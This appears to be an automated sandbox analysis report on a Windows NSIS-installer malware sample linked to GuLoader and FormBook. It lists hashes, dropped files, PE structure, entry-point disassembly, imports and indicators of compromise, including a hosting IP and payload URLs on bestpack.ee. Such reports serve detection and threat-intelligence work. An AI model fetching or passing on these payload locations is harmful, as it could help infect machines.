                                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                    Warnings

                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • VT rate limit hit for: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe

                                                                                                    Simulations

                                                                                                    Behavior and APIs

                                                                                                    No simulations

                                                                                                    Joe Sandbox View / Context

                                                                                                    IPs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    185.86.211.137D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • bestpack.ee/TUR.bin
                                                                                                    UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • bestpack.ee/POL.bin

                                                                                                    Domains

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    bestpack.eeD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 185.86.211.137
                                                                                                    UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 185.86.211.137

                                                                                                    ASNs

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    TVHORADADAESD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 185.86.211.137
                                                                                                    UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                    • 185.86.211.137
                                                                                                    http://glydesolar.comGet hashmaliciousUnknownBrowse
                                                                                                    • 185.76.79.50
                                                                                                    http://fswcf.orgGet hashmaliciousUnknownBrowse
                                                                                                    • 185.76.79.50
                                                                                                    firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 185.215.4.10
                                                                                                    nullnet_load.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 156.67.60.67
                                                                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 185.204.65.51
                                                                                                    77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 156.67.60.67
                                                                                                    0lMevtsZn2.elfGet hashmaliciousMiraiBrowse
                                                                                                    • 156.67.60.35
                                                                                                    205.185.120.123-skid.arm5-2024-07-27T10_33_41.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                    • 156.67.60.47

                                                                                                    JA3 Fingerprints

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    37f463bf4616ecd445d4a1937da06e19Cortex.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.86.211.137
                                                                                                    Cortex.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.86.211.137
                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 185.86.211.137
                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 185.86.211.137
                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 185.86.211.137
                                                                                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 185.86.211.137
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                                    • 185.86.211.137
                                                                                                    mSLEwIfTGL.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                    • 185.86.211.137
                                                                                                    #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 185.86.211.137
                                                                                                    175-33-26-24.HTA.htaGet hashmaliciousUnknownBrowse
                                                                                                    • 185.86.211.137

                                                                                                    Dropped Files

                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dllD#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                        UMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                          UMOWA_PD.BAT.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            Payment_Advice.1.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              Payment_Advice..exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                Payment_Advice..exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  Payment_Advice.1.bat.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    Payment_Advice..exeGet hashmaliciousGuLoaderBrowse

                                                                                                                      Created / dropped Files

                                                                                                                      C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12288
                                                                                                                      Entropy (8bit):5.805604762622714
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                                                      MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                                                      SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                                                      SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                                                                      SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
                                                                                                                      • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                      • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                                                                                      • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                                                                                      • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                                                                                      • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                                                                                                                      • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                                                      • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                                                      • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                                                                                                                      • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\polaritets\Klipbok.Vid

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):146048
                                                                                                                      Entropy (8bit):4.6065779762897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:LL9Fdl//kBP5+LtQdILRCc2U02fKGNMYqCAKNN06YV1e4iHHgGtyH3aYV0fo:3Fl++Ltt2GNxqCdNW6i18rtyH3ao
                                                                                                                      MD5:5AF6DF202041C4BFCCFFFC8A316C9A1A
                                                                                                                      SHA1:D9F6883DAE12C9E3DFA4A60B5CC4A231481A38B5
                                                                                                                      SHA-256:72820F9E966138202338EE85EF716A4352A9624FA5F4E42900C8B08C2FC39865
                                                                                                                      SHA-512:BB04146B10189062AA39507952BA1588FA20B21D9B817F889D42BAC22E54F810D1099F63484F309D4A51532FB34DDFF93101197224FC189F1FDA79105001125E
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.....YYY..................7......zzz.2.]]]].jj.....S...............HH.(...........9...........;;;;.....u......U.................//.o.E.............R.VV..................HH..............a......?.....r....D...<<<<..............sssss...................C..........................w..................c.........U.......---............^..,,...................TTT.,,,,.................j....VV..(......................................P....^......ZZ.ddd.....................:....''.......2..-...,.........8..b.................o..............222222......q.......#................................!!.....99.....zzz.............l..............|.............!!!...........L...D...x......=====......##........................s..Y.a........].................UU..?.........XXX.44.................J......L.........www................................S.....BB.............a...........b...........p....uu.....&...............::::.......-.........||................1..U............""........NNN.....a.l.....................

                                                                                                                      C:\Users\user\polaritets\Muskel.Nit

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):337530
                                                                                                                      Entropy (8bit):7.652545988590635
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:PF4NYyYBqXrQZimSkrb1nbm7WbwuZO/NoeWUejQfeT+0hvTT8LOdhkvwx:PFAYE00mSupSgO1duQ2vvH8LOd+wx
                                                                                                                      MD5:B9511C05839C7DE7AA19DC47A1E0A224
                                                                                                                      SHA1:BC9DDA4E870DAEE63244689DD42AB4E34BB676AD
                                                                                                                      SHA-256:DCE2C8C92DB5C0E6CBE667BA1FA4DF04465099C45478CD84ED93B5DCDBEB91C8
                                                                                                                      SHA-512:CFEA992238154FBD6C29C788CF79987E863E93ECC04A814F6B94F91E1DA5908EC337FE3786D1488E0DB2A23A71B1F487F606D760E1D223D5FDAC4D2BA1D01E54
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:.................UU.....PP.........4....8.........77.,,,.E...............................j."......jj...~.....F..........[[........................y..J.........................OOO.....o..........6.....................B...d..........UUUU...............UU.lll...f....C}.K.L.f.m.....Y....rX...8......Rs..lh...k.t...p.x..Z[..I.4.D..........A..s....0.V... N.e.C..a.U......9.u...7.]...&...@..h.\.....).f...f.r.....C.....d.n...iq..G..T..b.+-%>.......(6...`..w.._..;..?..1.,..z.3.o`.v.. .....@<..{..Q.~.!...A...O|~v.."F...gy.].#..Wc.Uk..J........}.K.L.f.m.f...f.c....3....Y....rX...8......Rs..lh...k.t...p.x..Z[..I4.......@4.D...s....0.V... N.e.C..a.U......9.u...7.]...&...@..h.\.....z.#...f....1..).......d.n...iq..G..T..b.+-%>.......(6...`....f....u...w.._..;..?..1.,..z.3.o`.<..{ ...f....:.Q.~.!...A...O|~v.."F...gy.].#..Wc.Uk..J........}.K.L.f.m...^!f......B.....Y....rX...8......Rs..lh...k.t...p.x..Z[..I.4.D...s.......f.a....".V... N.e.C..a.U......9.u...7.]..f

                                                                                                                      C:\Users\user\polaritets\Observationsposters.tor

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):97664
                                                                                                                      Entropy (8bit):1.2371741628878217
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:XEFQJPKWWG5ARWTJqBshVmdboj6UJY3VBCwYw2ZDRnv+mRQN:XUE/m2O3N
                                                                                                                      MD5:2B4D5FD79400969869ED030F4803BE99
                                                                                                                      SHA1:163C23302E2DA2B2265A7CD7ED08BE16A3853DCA
                                                                                                                      SHA-256:49C47AAA67085C8B38D02DC0F1F792E83FA17D41CE16927888C9085F530E9DB4
                                                                                                                      SHA-512:7EE103CCCC54B148E7AD62F37FF4ACFC4438436C6F75D15E5248CB19643348C70F2B63062712817002CE4D173E51A7A0C8B3851FCD0FC0D6E1302838909B1C2D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Preview:...........4................................................K..............................................W.......................................N........................................................@...5..................o............................................)............................................................~....=.................................................................................2................................................5.........................!....................................f.....k....%..................................................................................H...............%.@....................................(...........$.................V..........................................................6..6...........................................................................|....\................................................_........................y...................................................................6..

                                                                                                                      C:\Users\user\polaritets\drupes.ret

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):244138
                                                                                                                      Entropy (8bit):1.252663089946015
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:cv49C5wBVa5O2Fx8p7KLOTSo3NTuAG15VTvfAX+H7v+uQVsfpqSC26Pn6DD/SNsg:JBQxurv96jREO3X2r
                                                                                                                      MD5:BBD77A921062C9B6CBF4BEDFF50E1514
                                                                                                                      SHA1:C25712C5F69E016A364E8898B59E7229E3C5E7A4
                                                                                                                      SHA-256:E2882B3589FF6D9FA79AC2D88FC8DE8FD94BA046E8B9796203A4916C73731EAD
                                                                                                                      SHA-512:9BDFC20EFFD587EC19B524E36D392F4863C8242C8D4C8C7F81164A0E0DF84C5BF1633400873D0F68C40079113F9F2568706642334FCFDCCE4C6E0B1D7D5FB660
                                                                                                                      Malicious:false
                                                                                                                      Preview:....'........................`............Z......`.................................$..................S........J.........................................................................................................................................................................-........................N....E.......................y.........................................A..........k.............................2...............................%.........................................P.........................................e........................w.....................p.........................o.......................................F........)........................................~................................................................u.....................................................<...............................}.9......................^.................c.................A..............O.........................................................................|.

                                                                                                                      C:\Users\user\polaritets\quodlibetic.fes

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):438128
                                                                                                                      Entropy (8bit):1.2562406175237242
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:zN/79C7p5KmH/e6grFLDiN8w27kdDZK5M9aR:hyp5K4e6kFLoMV
                                                                                                                      MD5:E883CEF7CF2793E15A52C9BAC1CDE472
                                                                                                                      SHA1:1D4973110569354FA072BA3AFF0BD21EA0DF109A
                                                                                                                      SHA-256:2FF67336CFEEE418E565B0C79855927FC0CD0B1E9F2F40A59F1CB7EF2328635A
                                                                                                                      SHA-512:372BE015C3FA19C0EEAA981803900CA088B92188187A69697EEE808068F8033225BFD2927E2DB54EABEECAC05A421DC6CCCABFE19F39788B4F6D4E6F80CE04A5
                                                                                                                      Malicious:false
                                                                                                                      Preview:......q......y........................".........................................-....................................................n#............................Jj.........................................................................w.........................$................................................................i.............j.....K...................*.........................................=.........i..........0........~............................[......./.........,........Y.................~..............................................!.......w....................t....................F.......`........................................c.......................j................................................................................................".......................................<..............{..?.J............v........................................................................................................+..................+..................

                                                                                                                      C:\Users\user\polaritets\roere.hid

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15722
                                                                                                                      Entropy (8bit):1.1774803541140593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:QlmaSsDp47EcNFpMw8GM4Zq+AUUnPMN61WN1:QbSc47/lv8n4Zq+AUQmy4
                                                                                                                      MD5:A8FD81B22FDC76D0AAE4ABF40CC1E8F4
                                                                                                                      SHA1:ECA25609E68636E12C3AB63D7E9F1B7717CE450A
                                                                                                                      SHA-256:13148F74A847C0F474385F1E62C01A5065700A472BF689D7299D3F420A7CC45D
                                                                                                                      SHA-512:7E0CE6444E0F402278704066AE74F442684B80959CB90CFABA6A3BBCA1EB754EEBCDE11A61FE17D8DE1F708F035BDC2C7825BF9E8F92D761CE0E78BA68544C6B
                                                                                                                      Malicious:false
                                                                                                                      Preview:.............L..........................M...................................................................{.........................H.....................................................................................................................................................................................................................................9......8.....'...............}..........................F......................A......aO..........k.....................................................................................P..................................j.......'..:..................................n..............................................~......t.....2...............................................................................{u................................'.................................#.......................................................................t.......j...............r.................................................................

                                                                                                                      C:\Users\user\polaritets\socialmedicin.sej

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38361
                                                                                                                      Entropy (8bit):1.2166387306020765
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:X+F+sq/qAweG+1AI4KbEElQxRqKJOPOXALDW3uYBspm5NfXDZ9:X6M/l17oEnYjP
                                                                                                                      MD5:2BF0CAC964058C5B0D73930FC7412775
                                                                                                                      SHA1:003BEC59CB10BDD8B5B760C14DB899637E85AFBE
                                                                                                                      SHA-256:5A823D12E477927D5133F5B4DE1A5BCB0973FDBBDC4C966C821928CB439FC97A
                                                                                                                      SHA-512:303CF2DE6CFC652A10E543E0F6484097042234C786624F1B67668CA254B03DE2CCF4D7EB0FB6E13172F605B1B4B742D8694CF3549952523753C5DDE741975564
                                                                                                                      Malicious:false
                                                                                                                      Preview:......4......;................g....................................V..................s................................................t........................]...L.........................j...........`.....L..................?........o.............................Oq........................................................................F..............................................................V..................................................C.........../.......{................................................................?...............g.............R....4................................w(........................................c..p.................a....................mt...&..............................X........................Z.......................D.................<.......................h..........b..........X........................................................................m...................0...............F............................w.............r.......

                                                                                                                      C:\Users\user\polaritets\toader.txt

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):434
                                                                                                                      Entropy (8bit):4.305884836882498
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:mBX7vwwJDXCuNQLIU/0vkxuYAz8/p7QTrYSCmDEIHlwq+:mBXUWEzR7ylCeEUw
                                                                                                                      MD5:3F6632F26EBA2C111F54C97312D4C4EA
                                                                                                                      SHA1:8D3FB7505058C8C5CB22133C77213D6B37CDD5F9
                                                                                                                      SHA-256:CE8824C6205F36A17C4476BF02839F065009CD15E88970E653CE5F6A89BD9954
                                                                                                                      SHA-512:EED0879B222E9F074C109B2FA8548F441AD1A4C1CEF8EDB3BAE6D05308E2916061F2A2835E9252A2EDE27608435E40E8C52849B9DD8D38A5FBBEC995628D28E7
                                                                                                                      Malicious:false
                                                                                                                      Preview:kumquat equilibrious invector occludes vesteuroperen knippelfines,laparosplenotomy subagents skatkisternes sovehjertet angiospermous abastard caprate efterbyrdens exercised organisationsliniens puberties..ansvarhavendes unhumidified fordjelsesproces forureningsomraades,nondivisive famle illicitly lithophone lattins cubit rougens svmmebrillerne..untestamental transect subfestively subserviently hyldevarer.maaske pastoral overlooks,

                                                                                                                      Static File Info

                                                                                                                      General

                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.956957743632461
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File size:559'533 bytes
                                                                                                                      MD5:09646b466d4203f0a605120c10248654
                                                                                                                      SHA1:e1f6e1bec33b598963a6e017d41e28b72a6e9bbd
                                                                                                                      SHA256:7110772ac28b158130afc68ae0f00bdca6832cc826f7f2fbf38fd373feb16b2f
                                                                                                                      SHA512:74414f447846f9a51a381a30ab6d08b66cf68f8fcc2ee42ce0fdf41e4914c4dc2b4ab5bd26d85e71f92e3d0ce7badb274ec68973a74506caca26f60d60d80f24
                                                                                                                      SSDEEP:12288:qX69L27aMq4PfZ6Vt1wFHLesCqew8wmjAjPJbbiEUW34/:qX69Ln4Pfc9whLTCkmUjBqEUW
                                                                                                                      TLSH:13C42343B870D6ABFA651334563683A98AFD7C210291339F2F44BF6EB9289C5D91D343
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....

                                                                                                                      File Icon

                                                                                                                      Icon Hash:9193c9a1858b8db5

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x4034fc
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      sub esp, 000003F8h
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      push 00000020h
                                                                                                                      pop edi
                                                                                                                      xor ebp, ebp
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [esp+20h], ebp
                                                                                                                      mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                      call dword ptr [004080A4h]
                                                                                                                      mov esi, dword ptr [004080A8h]
                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                      push eax
                                                                                                                      mov dword ptr [esp+4Ch], ebp
                                                                                                                      mov dword ptr [esp+0000014Ch], ebp
                                                                                                                      mov dword ptr [esp+00000150h], ebp
                                                                                                                      mov dword ptr [esp+38h], 0000011Ch
                                                                                                                      call esi
                                                                                                                      test eax, eax
                                                                                                                      jne 00007FD5BCCF916Ah
                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                      mov dword ptr [esp+34h], 00000114h
                                                                                                                      push eax
                                                                                                                      call esi
                                                                                                                      mov ax, word ptr [esp+48h]
                                                                                                                      mov ecx, dword ptr [esp+62h]
                                                                                                                      sub ax, 00000053h
                                                                                                                      add ecx, FFFFFFD0h
                                                                                                                      neg ax
                                                                                                                      sbb eax, eax
                                                                                                                      mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                      not eax
                                                                                                                      and eax, ecx
                                                                                                                      mov word ptr [esp+00000148h], ax
                                                                                                                      cmp dword ptr [esp+38h], 0Ah
                                                                                                                      jnc 00007FD5BCCF9138h
                                                                                                                      and word ptr [esp+42h], 0000h
                                                                                                                      mov eax, dword ptr [esp+40h]
                                                                                                                      movzx ecx, byte ptr [esp+3Ch]
                                                                                                                      mov dword ptr [00429AD8h], eax
                                                                                                                      xor eax, eax
                                                                                                                      mov ah, byte ptr [esp+38h]
                                                                                                                      movzx eax, ax
                                                                                                                      or eax, ecx
                                                                                                                      xor ecx, ecx
                                                                                                                      mov ch, byte ptr [esp+00000148h]
                                                                                                                      movzx ecx, cx
                                                                                                                      shl eax, 10h
                                                                                                                      or eax, ecx
                                                                                                                      movzx ecx, byte ptr [esp+0000004Eh]

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000x3440.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                      .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .ndata0x2a0000x220000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                      .rsrc0x4c0000x34400x36005950a4e36f0f510396fb34e6e03b573aFalse0.5579427083333334data5.567094918094419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                      RT_ICON0x4c2f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.7190831556503199
                                                                                                                      RT_ICON0x4d1a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7035198555956679
                                                                                                                      RT_ICON0x4da480x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.33963414634146344
                                                                                                                      RT_ICON0x4e0b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.6423410404624278
                                                                                                                      RT_ICON0x4e6180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.39381720430107525
                                                                                                                      RT_ICON0x4e9000x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5101351351351351
                                                                                                                      RT_DIALOG0x4ea280x100dataEnglishUnited States0.5234375
                                                                                                                      RT_DIALOG0x4eb280x11cdataEnglishUnited States0.6056338028169014
                                                                                                                      RT_DIALOG0x4ec480xc4dataEnglishUnited States0.5918367346938775
                                                                                                                      RT_DIALOG0x4ed100x60dataEnglishUnited States0.7291666666666666
                                                                                                                      RT_GROUP_ICON0x4ed700x5adataEnglishUnited States0.7111111111111111
                                                                                                                      RT_VERSION0x4edd00x248dataEnglishUnited States0.4811643835616438
                                                                                                                      RT_MANIFEST0x4f0180x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                                                      SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                                                      ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                                                      COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
